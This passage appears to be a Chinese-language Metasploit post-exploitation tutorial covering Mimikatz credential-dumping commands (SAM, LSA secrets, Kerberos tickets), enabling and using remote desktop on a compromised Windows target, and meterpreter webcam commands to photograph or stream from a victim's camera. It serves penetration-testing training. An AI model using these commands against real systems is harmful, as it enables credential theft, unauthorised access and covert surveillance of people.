11 kerberos_ticket_purge:清除kerberos票据
12 kerberos_ticket_use:使用kerberos票据
13 kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令
14 lsa_dump_sam:dump出lsa的SAM
15 lsa_dump_secrets:dump出lsa的密文
16 password_change:修改密码
17 wifi_list:列出当前用户的wifi配置文件
18 wifi_list_shared:列出共享wifi配置文件/编码

22 后渗透之远程监控(Windows)

一、环境准备

1 rdesktop

在线安装 rdesktop


Debian,Ubuntu,kali下使用以下命令

apt-get install rdesktop


Centos/RedHat可以通过yum命令

yum -y install rdesktop

2 一台windiows靶机(没有物理电脑可以使用虚拟机代替)

3 MSF-Metasploit Framework

二、实战

1 使用rdesktop远程控制

说明:rdesktop是linux下支持Windows远程桌面连接的客户端程序,在linux系统下可通过它远程访问Windows桌面,支持多种版本。rdesktop是sourceforge下支持GPL协议的一个开源项目,采用RDP(Remote Desktop Protocol,远程桌面协议),几乎可以连接windows的所有版本

rdesktop常用参数

id 参数 描述
1 -u 账户名
2 -p 密码
3 -a 16 指使用16位色显示远程画面
4 -f 全屏模式(用Ctrl+Alt+Enter 组合键退出全屏)
5 -g 设置分辨率 如 : -g 1024x768
6 rdesktop -h 查看rdesktop使用帮助

rdesktop -u 用户名 -p 密码 -f IP

rdesktop -u mb -p 123456 -f -g 1024x720 192.168.110.24

如果远程计算机没有启动远程功能我们可以在meterpreter中输入

启动远程桌面协议:run post/windows/manage/enable_rdp


2 通过vnc远程

23 后渗透之调用摄像头

一、环境准备

1 MSF-Metasploit Framework

2 一台windiows靶机

3 一台安卓设备,没有可以使用模拟器

二、实战

靶机获取到meterpreter后我们可以使用 webcam模块实现调用软,硬件摄像头

webcam模块支持命令

id 模块名 解释
1 webcam_list 列出靶机中的所有软,硬件摄像头列表,并编号
2 webcam_snap 可调用单个软,硬件摄像头拍照,默认调用第一个摄像头
3 webcam_stream 可调用单个软,硬件摄像头直播,默认调用第一个摄像头

1 webcam_list

2 webcam_snap 调用单个软,硬件摄像头拍照

id 参数 描述
1 -h 显示帮助
2 -i -i 1 “1”代表调用摄像头编号
3 -p -p /root "root"设置存储路径
4 -q -q 100 “100” 表示存储图片的质量默认为 50
5 -v -v false -v 2个参数 true 和 false 这个参数表示拍照后自动打开,默认参数为true

3 webcam_stream 调用单个软,硬件摄像头直播

id 参数 描述
1 -h 显示帮助
2 -d -d 100 “100”=100秒 设置流持续时间为100秒 默认为1800
3 -i -i 1 “1”代表调用摄像头编号
4 -q -q 100 “100”指流质量 默认为50
5 -s -s live “live”指流文件路径 默认输出在当前目录(注意目录不存在不会自动创建)
7 -f -f live “live”指播放文件的存储地址 默认输出在当前目录
8 -v -v false -v 2个参数 true 和 false 这个参数表示拍照后自动打开,默认参数为true

你可能感兴趣的:(渗透测试,安全,网络,系统安全,web安全,网络安全)